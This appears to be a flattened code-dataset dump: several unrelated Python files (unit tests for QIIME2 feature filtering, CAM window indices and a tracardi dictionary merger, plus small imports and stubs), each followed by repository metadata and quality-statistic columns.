description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2018, 8, 1),
)
TimelineEvent.objects.create(
timeline=timeline,
title='2017',
subtitle='Network Engineer',
description='Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum mattis felis vitae risus pulvinar tincidunt. Nam ac venenatis enim. Aenean hendrerit justo sed.',
date=datetime.date(2017, 8, 1),
)
post_save.connect(my_first_timeline, sender=User)
| 67.921875
| 518
| 0.715666
| 529
| 4,347
| 5.862004
| 0.175803
| 0.051596
| 0.077394
| 0.092873
| 0.806192
| 0.806192
| 0.791035
| 0.791035
| 0.72783
| 0.709126
| 0
| 0.014854
| 0.225673
| 4,347
| 63
| 519
| 69
| 0.906417
| 0.031516
| 0
| 0.3
| 0
| 0.12
| 0.640983
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02
| false
| 0
| 0.08
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96a95333fce1219a58a721e5f154cf26475f370
| 8,201
|
py
|
Python
|
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/tests/filter/test_filter_features.py
|
cguccione/q2-feature-table
|
90b75bb4848371bd640fe7c4baf14bc448d597c9
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import unittest
import qiime2
import numpy as np
import pandas as pd
from biom.table import Table
from q2_feature_table import filter_features
class FilterFeaturesTests(unittest.TestCase):
""" These tests are minimal relative to FilterSamplesTests, since the
two functions being tested using the same private function under the
hood. These tests cover the two places where the axis parameter is
passed, to ensure that the tests work on the 'observation' axis as
well as the 'sample' axis.
"""
def test_min_frequency(self):
# no filtering
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=2)
expected = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=3)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=5)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
def test_filter_empty_samples(self):
# no filtering
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=2,
filter_empty_samples=False)
expected = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
table = Table(np.array([[0, 1, 1], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, min_frequency=5,
filter_empty_samples=False)
expected = Table(np.empty((0, 3)), [], ['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
def test_feature_metadata(self):
# no filtering
df = pd.DataFrame({'SequencedGenome': ['yes', 'yes']},
index=pd.Index(['O1', 'O2'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
df = pd.DataFrame({'SequencedGenome': ['yes']},
index=pd.Index(['O1'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([[1, 3]]),
['O1'],
['S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
df = pd.DataFrame({}, index=pd.Index(['foo'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
# exclude one
df = pd.DataFrame({'SequencedGenome': ['yes']},
index=pd.Index(['O1'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata,
exclude_ids=True)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# exclude all
df = pd.DataFrame({'SequencedGenome': ['yes', 'yes']},
index=pd.Index(['O1', 'O2'], name='id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
actual = filter_features(table, metadata=metadata,
exclude_ids=True)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
def test_where(self):
# no filtering
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes' OR SequencedGenome='no'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
# filter one
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([[1, 3]]),
['O1'],
['S2', 'S3'])
self.assertEqual(actual, expected)
# filter all
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes' AND SequencedGenome='no'"
actual = filter_features(table, metadata=metadata, where=where)
expected = Table(np.array([]), [], [])
self.assertEqual(actual, expected)
# filter one -> exclude one
df = pd.DataFrame({'SequencedGenome': ['yes', 'no']},
index=pd.Index(['O1', 'O2'], name='feature-id'))
metadata = qiime2.Metadata(df)
table = Table(np.array([[0, 1, 3], [1, 1, 2]]),
['O1', 'O2'],
['S1', 'S2', 'S3'])
where = "SequencedGenome='yes'"
actual = filter_features(table,
exclude_ids=True,
metadata=metadata,
where=where)
expected = Table(np.array([[1, 1, 2]]),
['O2'],
['S1', 'S2', 'S3'])
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
| 40.800995
| 78
| 0.444946
| 844
| 8,201
| 4.270142
| 0.132701
| 0.019423
| 0.0899
| 0.046615
| 0.81576
| 0.813818
| 0.808546
| 0.778024
| 0.753607
| 0.746393
| 0
| 0.052429
| 0.365077
| 8,201
| 200
| 79
| 41.005
| 0.639716
| 0.098768
| 0
| 0.828947
| 0
| 0
| 0.082162
| 0.011464
| 0
| 0
| 0
| 0
| 0.092105
| 1
| 0.026316
| false
| 0
| 0.039474
| 0
| 0.072368
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9a23bb7e0690bd40e864d392e0d6e9d9dbb88f4
| 3,974
|
py
|
Python
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 83
|
2015-01-15T14:54:16.000Z
|
2021-12-09T11:28:02.000Z
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 579
|
2015-01-14T15:57:37.000Z
|
2022-01-13T18:58:44.000Z
|
halotools/empirical_models/abunmatch/tests/test_sample2_window_function.py
|
pllim/halotools
|
6499cff09e7e0f169e4f425ee265403f6be816e8
|
[
"BSD-3-Clause"
] | 70
|
2015-01-14T15:15:58.000Z
|
2021-12-22T18:18:31.000Z
|
""" Module testing the sample2_window_indices function that returns the
relevant CAM window to the naive python implementation.
"""
import numpy as np
from .naive_python_cam import sample2_window_indices
def test_left_edge_window():
""" Setup: x1 == x2. Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(n2)
nwin = 5
ix1 = 0
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 1
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 2
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 3
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (1, nwin+1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 4
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (2, nwin+2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_right_edge_window():
""" Setup: x1 == x2. Enforce proper behavior at the rightmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(n2)
nwin = 5
ix1 = 19
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 18
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 17
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 16
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin-1, n2-1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
ix1 = 15
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin-2, n2-2)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_all_x1_less_than_x2():
""" Setup: np.all(x1 < x2.min()).
Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(100, 100+n2)
nwin = 5
for ix1 in range(n1):
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (0, nwin), "ix1 = {0}".format(ix1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
def test_all_x1_greater_than_x2():
""" Setup: np.all(x1 < x2.min()).
Enforce proper behavior at the leftmost edge.
"""
n1, n2 = 20, 20
x_sample1 = np.arange(n1)
x_sample2 = np.arange(-100, -100+n2)
nwin = 5
for ix1 in range(n1):
init_iy2_low, init_iy2_high = sample2_window_indices(
ix1, x_sample1, x_sample2, nwin)
assert (init_iy2_low, init_iy2_high) == (n2-nwin, n2), "ix1 = {0}".format(ix1)
assert len(x_sample2[init_iy2_low:init_iy2_high]) == nwin
| 32.57377
| 86
| 0.674887
| 638
| 3,974
| 3.836991
| 0.10815
| 0.205882
| 0.147059
| 0.205882
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0.905637
| 0
| 0.083654
| 0.214897
| 3,974
| 121
| 87
| 32.842975
| 0.700962
| 0.104177
| 0
| 0.707317
| 0
| 0
| 0.005128
| 0
| 0
| 0
| 0
| 0
| 0.292683
| 1
| 0.04878
| false
| 0
| 0.02439
| 0
| 0.073171
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b9dfdc75356229ddbebc9973a7df858418b6fb77
| 46
|
py
|
Python
|
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
screen_behaviour/init.py
|
AsgerAndersen/ByOurOwnDevices
|
8b3893aab289584182bd8ded7da13abbcb14f519
|
[
"MIT"
] | null | null | null |
from .screen_behaviour import screen_behaviour
| 46
| 46
| 0.913043
| 6
| 46
| 6.666667
| 0.666667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.930233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9e8a7754acfef3d93cda04c62e4e809ad243ecd
| 246
|
py
|
Python
|
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
nextcord/ext/interactions/message/message_command.py
|
abrahammurciano/nextcord
|
e55be422a1b923fc498b04f82172d5a0d263eb71
|
[
"MIT"
] | null | null | null |
from nextcord.ext.interactions.application_command import ApplicationCommand
class MessageCommand(ApplicationCommand):
"""
TODO: Implement
https://discord.com/developers/docs/interactions/application-commands#message-commands
"""
| 35.142857
| 90
| 0.792683
| 23
| 246
| 8.434783
| 0.826087
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109756
| 246
| 7
| 91
| 35.142857
| 0.885845
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9f29412f9d11e7cf345f39fa16f88272647c0da
| 150
|
py
|
Python
|
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
uq360/algorithms/blackbox_metamodel/__init__.py
|
rpestourie/UQ360
|
85e2cd33c65687119db824c8d6770f05c4e509e4
|
[
"Apache-2.0"
] | null | null | null |
from .blackbox_metamodel_regression import BlackboxMetamodelRegression
from .blackbox_metamodel_classification import BlackboxMetamodelClassification
| 50
| 78
| 0.933333
| 12
| 150
| 11.333333
| 0.666667
| 0.176471
| 0.308824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053333
| 150
| 2
| 79
| 75
| 0.957746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6a0eb8de80c2e638bf24b2808e6384b356b35777
| 8,673
|
py
|
Python
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 29
|
2021-04-17T06:04:46.000Z
|
2021-11-25T10:22:43.000Z
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 77
|
2021-04-03T21:20:04.000Z
|
2021-10-17T10:12:23.000Z
|
tracardi/tests/unit/test_merger.py
|
ryomahan/read-tracardi
|
216b05395d70a869593a60e2804e0a71b58dfc8f
|
[
"MIT"
] | 17
|
2021-06-29T13:13:18.000Z
|
2021-10-17T10:52:57.000Z
|
from datetime import datetime
from tracardi.service.merger import merge
def test_merger_multiple_values():
a = {"a": None}
b = {"a": .2}
c = {"a": [1]}
d = {"a": "3"}
m = merge({}, [a, b, c, d])
assert set(m['a']).intersection({.2, 1, "3"}) == {.2, 1, "3"}
def test_merger_none_values():
a = {"a": None}
b = {"a": "2"}
assert merge({}, [a, b]) == {"a": "2"}
a = {"a": None}
b = {"a": None}
assert merge({}, [a, b]) == {}
def test_merger_missing_values():
a = {}
b = {"a": "2"}
assert merge({}, [a, b]) == {"a": "2"}
def test_merger_values_no_intersection():
a = {"b": 1}
b = {"a": "2"}
assert merge({}, [a, b]) == {"b": 1, "a": "2"}
def test_merger_single_values():
# mixed
a = {"a": 1}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
# string
a = {"a": "1"}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
# int
a = {"a": 1}
b = {"a": 2}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
# float
a = {"a": .1}
b = {"a": .2}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
def test_merger_bool_values():
a = {"a": True}
b = {"a": False, "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": True}
b = {"a": [False], "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": [True]}
b = {"a": False, "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
a = {"a": [True]}
b = {"a": (False,), "b": True}
c = merge({}, [a, b])
assert c == {"a": [False, True], "b": True}
def test_merger_single_value_plus_list():
# mixed
a = {"a": [1]}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
a = {"a": 1}
b = {"a": ["2"]}
c = merge({}, [a, b])
assert c == {"a": [1, "2"]} or c == {"a": ["2", 1]}
# string
a = {"a": ["1"]}
b = {"a": "2"}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
a = {"a": "1"}
b = {"a": ["2"]}
c = merge({}, [a, b])
assert c == {"a": ["2", "1"]} or c == {"a": ["1", "2"]}
# int
a = {"a": [1]}
b = {"a": 2}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
a = {"a": 1}
b = {"a": [2]}
c = merge({}, [a, b])
assert c == {"a": [1, 2]} or c == {"a": [2, 1]}
# float
a = {"a": [.1]}
b = {"a": .2}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
a = {"a": .1}
b = {"a": [.2]}
c = merge({}, [a, b])
assert c == {"a": [.1, .2]} or c == {"a": [.2, .1]}
def test_merger_uniq():
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": ["2", "1"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
def test_merger_immutable():
a = {"a": {"b": ["1", "2", "1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert a == {"a": {"b": ["1", "2", "1"]}} and b == {"a": {"b": "2"}}
def test_merger_same_value():
a = {"b": 1}
b = {"b": 1}
c = merge({}, [a, b])
assert c == {"b": 1}
a = {"a": {"b": 1}}
b = {"a": {"b": 1}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": [1]}}
b = {"a": {"b": 1}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": 1}}
b = {"a": {"b": [1]}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
a = {"a": {"b": [1]}}
b = {"a": {"b": [1]}}
c = merge({}, [a, b])
assert c == {"a": {"b": 1}}
def test_merger_dict_single_values():
# mixed
a = {"a": {"b": 1}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or c == {"a": {"b": ["2", 1]}}
# string
a = {"a": {"b": "1"}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
# int
a = {"a": {"b": 1}}
b = {"a": {"b": 2}}
assert merge({}, [a, b]) == {"a": {"b": [1, 2]}}
# float
a = {"a": {"b": .1}}
b = {"a": {"b": .2}}
assert merge({}, [a, b]) == {"a": {"b": [.1, .2]}}
def test_merger_dict_list_2_list():
a = {"a": {"b": [1, 2]}}
b = {"a": {"b": [3, 4]}}
c = merge({}, [a, b])
assert "b" in c['a'] and set(c['a']['b']).intersection({1, 2, 3, 4}) == {1, 2, 3, 4}
a = {"a": [1, 2, 3]}
b = {"a": [3, 4, 5]}
c = merge({}, [a, b])
assert set(c['a']).intersection({1, 2, 3, 4, 5}) == {1, 2, 3, 4, 5}
def test_merger_dict_list_2_set():
a = {"a": {"b": {1, 2}}}
b = {"a": {"b": [3, 4]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": {"b": [1, 2]}}
b = {"a": {"b": {3, 4}}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": [1, 2, 3]}
b = {"a": {3, 4, 5}}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3, 4, 5]}
def test_merger_dict_set_2_set():
a = {"a": {"b": {1, 2}}}
b = {"a": {"b": {3, 4}}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2, 3, 4]}}
a = {"a": {1, 2, 3}}
b = {"a": {3, 4, 5}}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3, 4, 5]}
def test_merger_tuple_2_list():
"""
Merges dict with value int, float, str
"""
a = {"a": 1}
b = {"a": (2, 3)}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3]}
a = {"a": [1]}
b = {"a": (2, 3)}
c = merge({}, [a, b])
assert c == {"a": [1, 2, 3]}
def test_merger_dict_single_list_values():
# mixed dict
a = {"a": {"b": [1]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or c == {"a": {"b": ["2", 1]}}
a = {"a": {"b": 1}}
b = {"a": {"b": ["2"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, "2"]}} or {"a": {"b": ["2", 1]}}
# int
a = {"a": {"b": [1]}}
b = {"a": {"b": 2}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2]}} or c == {"a": {"b": [2, 1]}}
a = {"a": {"b": 1}}
b = {"a": {"b": [2]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [1, 2]}} or c == {"a": {"b": [2, 1]}}
# float
a = {"a": {"b": [.1]}}
b = {"a": {"b": .2}}
c = merge({}, [a, b])
assert c == {"a": {"b": [.1, .2]}} or c == {"a": {"b": [.2, .1]}}
a = {"a": {"b": .1}}
b = {"a": {"b": [.2]}}
c = merge({}, [a, b])
assert c == {"a": {"b": [.1, .2]}} or c == {"a": {"b": [.2, .1]}}
# string
a = {"a": {"b": ["1"]}}
b = {"a": {"b": "2"}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
a = {"a": {"b": "1"}}
b = {"a": {"b": ["2"]}}
c = merge({}, [a, b])
assert c == {"a": {"b": ["2", "1"]}} or c == {"a": {"b": ["1", "2"]}}
def test_merger_conflict_1():
"""
Merges dict with value int, float, str
"""
a = {"a": 1}
b = {"a": {"b": 1}}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": {"b": 1}}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_2():
"""
Merges dict with value int, float, str
"""
a = {"a": 1}
b = {"a": datetime.now()}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_3():
"""
Conflict inside list of values
"""
a = {"a": 1}
b = {"a": [2, [3]]}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": [2, [3]]}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": (2, [3])}
b = {"a": 1}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": 1}
b = {"a": (2, [3])}
try:
merge({}, [a, b])
except ValueError:
assert True
def test_merger_conflict_4():
"""
Conflict inside list of values
"""
a = {"a": datetime.now}
b = {"a": [2, 3]}
try:
merge({}, [a, b])
except ValueError:
assert True
a = {"a": datetime.now()}
b = {"a": [2, 3]}
try:
merge({}, [a, b])
except ValueError:
assert True
| 21.521092
| 88
| 0.335293
| 1,335
| 8,673
| 2.125094
| 0.041948
| 0.102926
| 0.145576
| 0.121255
| 0.865703
| 0.81565
| 0.808248
| 0.77018
| 0.764188
| 0.736341
| 0
| 0.053179
| 0.323533
| 8,673
| 402
| 89
| 21.574627
| 0.430373
| 0.031823
| 0
| 0.786765
| 0
| 0
| 0.045268
| 0
| 0
| 0
| 0
| 0
| 0.216912
| 1
| 0.073529
| false
| 0
| 0.007353
| 0
| 0.080882
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
